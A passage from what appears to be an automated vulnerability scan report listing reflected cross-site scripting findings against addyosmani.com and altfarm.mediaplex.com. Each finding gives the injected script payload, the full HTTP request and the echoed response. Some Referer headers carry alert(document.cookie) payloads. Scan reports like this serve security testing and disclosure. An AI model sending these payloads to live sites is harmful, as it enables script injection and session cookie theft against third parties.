Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:09 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes629ec\"><script>alert(1)</script>cb0b354f1f3/js/thickbox/thickbox.css?ver=20090514"/>
...[SNIP]...

1.43. http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/thickbox/thickbox.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6deeb"><script>alert(1)</script>d5349be6f45 was submitted in the REST URL parameter 3. This input was echoed as 6deeb\"><script>alert(1)</script>d5349be6f45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js6deeb"><script>alert(1)</script>d5349be6f45/thickbox/thickbox.css?ver=20090514 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:12 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/js6deeb\"><script>alert(1)</script>d5349be6f45/thickbox/thickbox.css?ver=20090514"/>
...[SNIP]...

1.44. http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/thickbox/thickbox.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1193"><script>alert(1)</script>3de8dc9ec6e was submitted in the REST URL parameter 4. This input was echoed as a1193\"><script>alert(1)</script>3de8dc9ec6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js/thickboxa1193"><script>alert(1)</script>3de8dc9ec6e/thickbox.css?ver=20090514 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:15 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/js/thickboxa1193\"><script>alert(1)</script>3de8dc9ec6e/thickbox.css?ver=20090514"/>
...[SNIP]...

1.45. http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/thickbox/thickbox.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9db25"><script>alert(1)</script>d8ede75f171 was submitted in the REST URL parameter 5. This input was echoed as 9db25\"><script>alert(1)</script>d8ede75f171 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js/thickbox/thickbox.css9db25"><script>alert(1)</script>d8ede75f171?ver=20090514 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:19 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.css9db25\"><script>alert(1)</script>d8ede75f171?ver=20090514"/>
...[SNIP]...

1.46. http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/thickbox/thickbox.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 375e4"><script>alert(1)</script>7c7d83dd3d9 was submitted in the REST URL parameter 2. This input was echoed as 375e4\"><script>alert(1)</script>7c7d83dd3d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes375e4"><script>alert(1)</script>7c7d83dd3d9/js/thickbox/thickbox.js?ver=3.1-20100407 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:36 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes375e4\"><script>alert(1)</script>7c7d83dd3d9/js/thickbox/thickbox.js?ver=3.1-20100407"/>
...[SNIP]...

1.47. http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/thickbox/thickbox.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b8c7"><script>alert(1)</script>2f2e85b9e43 was submitted in the REST URL parameter 3. This input was echoed as 4b8c7\"><script>alert(1)</script>2f2e85b9e43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js4b8c7"><script>alert(1)</script>2f2e85b9e43/thickbox/thickbox.js?ver=3.1-20100407 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:39 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/js4b8c7\"><script>alert(1)</script>2f2e85b9e43/thickbox/thickbox.js?ver=3.1-20100407"/>
...[SNIP]...

1.48. http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/thickbox/thickbox.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0283"><script>alert(1)</script>20365640c07 was submitted in the REST URL parameter 4. This input was echoed as f0283\"><script>alert(1)</script>20365640c07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js/thickboxf0283"><script>alert(1)</script>20365640c07/thickbox.js?ver=3.1-20100407 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:43 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/js/thickboxf0283\"><script>alert(1)</script>20365640c07/thickbox.js?ver=3.1-20100407"/>
...[SNIP]...

1.49. http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/thickbox/thickbox.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ec63"><script>alert(1)</script>8f78decd4a6 was submitted in the REST URL parameter 5. This input was echoed as 3ec63\"><script>alert(1)</script>8f78decd4a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js/thickbox/thickbox.js3ec63"><script>alert(1)</script>8f78decd4a6?ver=3.1-20100407 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.js3ec63\"><script>alert(1)</script>8f78decd4a6?ver=3.1-20100407"/>
...[SNIP]...

1.50. http://altfarm.mediaplex.com/ad/js/1551-47634-16084-8 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-47634-16084-8

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fab29'-alert(1)-'01f2172dd5f was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/1551-47634-16084-8?mpt=1297260344fab29'-alert(1)-'01f2172dd5f&mpvc=http://ib.adnxs.com/click/PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEtAQAAQUCAAIAAAAAHCRWxAAAAAA./cnd=!2BlmBwi--gIQqakLGAAg5NUBKOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA../referrer=http%3A%2F%2Ftechnorati.com%2Fcontact-us%2F/clickenc= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEtAQAAgUCAAIAAAAAHSRnxAAAAAA.&udj=uf%28%27a%27%2C+6788%2C+1297260344%29%3Buf%28%27g%27%2C+21129%2C+1297260344%29%3Buf%28%27r%27%2C+185513%2C+1297260344%29%3Bppv%289354%2C+%272423804119949281501%27%2C+1297260344%2C+1298469944%2C+48446%2C+27364%29%3B&cnd=!2BlmBwi--gIQqakLGAAg5NUBKOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA..&referrer=http://technorati.com/contact-us/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo3=1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; mojo2=12109:6166

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 592
Date: Wed, 09 Feb 2011 14:08:33 GMT

document.write('<a target="_blank" href="http://ib.adnxs.com/click/PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEA
...[SNIP]...
KOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA../referrer=http://technorati.com/contact-us//clickenc=http://altfarm.mediaplex.com/ad/ck/1551-47634-16084-8?mpt=1297260344fab29'-alert(1)-'01f2172dd5f">
...[SNIP]...

1.51. http://altfarm.mediaplex.com/ad/js/1551-47634-16084-8 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-47634-16084-8

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84fc8'%3balert(1)//dd88c5f60fb was submitted in the mpvc parameter. This input was echoed as 84fc8';alert(1)//dd88c5f60fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/1551-47634-16084-8?mpt=1297260344&mpvc=http://ib.adnxs.com/click/PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEtAQAAQUCAAIAAAAAHCRWxAAAAAA./cnd=!2BlmBwi--gIQqakLGAAg5NUBKOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA../referrer=http%3A%2F%2Ftechnorati.com%2Fcontact-us%2F/clickenc=84fc8'%3balert(1)//dd88c5f60fb HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEtAQAAgUCAAIAAAAAHSRnxAAAAAA.&udj=uf%28%27a%27%2C+6788%2C+1297260344%29%3Buf%28%27g%27%2C+21129%2C+1297260344%29%3Buf%28%27r%27%2C+185513%2C+1297260344%29%3Bppv%289354%2C+%272423804119949281501%27%2C+1297260344%2C+1298469944%2C+48446%2C+27364%29%3B&cnd=!2BlmBwi--gIQqakLGAAg5NUBKOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA..&referrer=http://technorati.com/contact-us/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo3=1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; mojo2=12109:6166

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 592
Date: Wed, 09 Feb 2011 14:08:34 GMT

document.write('<a target="_blank" href="http://ib.adnxs.com/click/PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEA
...[SNIP]...
wB-gCoAecEtAQAAQUCAAIAAAAAHCRWxAAAAAA./cnd=!2BlmBwi--gIQqakLGAAg5NUBKOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA../referrer=http://technorati.com/contact-us//clickenc=84fc8';alert(1)//dd88c5f60fbhttp://altfarm.mediaplex.com/ad/ck/1551-47634-16084-8?mpt=1297260344">
...[SNIP]...

1.52. http://altfarm.mediaplex.com/ad/js/1551-47634-16084-8 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-47634-16084-8

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39878'%3balert(1)//4fc5e08aefa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39878';alert(1)//4fc5e08aefa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/1551-47634-16084-8?mpt=1297260344&mpvc=http://ib.adnxs.com/click/PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEtAQAAQUCAAIAAAAAHCRWxAAAAAA./cnd=!2BlmBwi--gIQqakLGAAg5NUBKOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA../referrer=http%3A%2F%2Ftechnorati.com%2Fcontact-us%2F/clickenc=&39878'%3balert(1)//4fc5e08aefa=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEtAQAAgUCAAIAAAAAHSRnxAAAAAA.&udj=uf%28%27a%27%2C+6788%2C+1297260344%29%3Buf%28%27g%27%2C+21129%2C+1297260344%29%3Buf%28%27r%27%2C+185513%2C+1297260344%29%3Bppv%289354%2C+%272423804119949281501%27%2C+1297260344%2C+1298469944%2C+48446%2C+27364%29%3B&cnd=!2BlmBwi--gIQqakLGAAg5NUBKOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA..&referrer=http://technorati.com/contact-us/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo3=1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; mojo2=12109:6166

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 595
Date: Wed, 09 Feb 2011 14:08:36 GMT

document.write('<a target="_blank" href="http://ib.adnxs.com/click/PDw8vLS09D8AAACgmZnxPwAAAKCZmfE_j8L1KFyP_D_NzMzMzMwAQN2ItFYBFaMhBWHfHSmrEEI4n1JNAAAAABmRAwA2AQAAHQIAAAIAAACp1AIA5GoAAAEAAABVU0QAVVNEA
...[SNIP]...
B-gCoAecEtAQAAQUCAAIAAAAAHCRWxAAAAAA./cnd=!2BlmBwi--gIQqakLGAAg5NUBKOcJMczMzMzMzABAQhMIABAAGAAgASj-__________8BQgsIikkQABgAIAMoAUgAUABYqANgAGidBA../referrer=http://technorati.com/contact-us//clickenc=&39878';alert(1)//4fc5e08aefa=1http://altfarm.mediaplex.com/ad/ck/1551-47634-16084-8?mpt=1297260344">
...[SNIP]...

1.53. http://api-public.addthis.com/url/shares.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

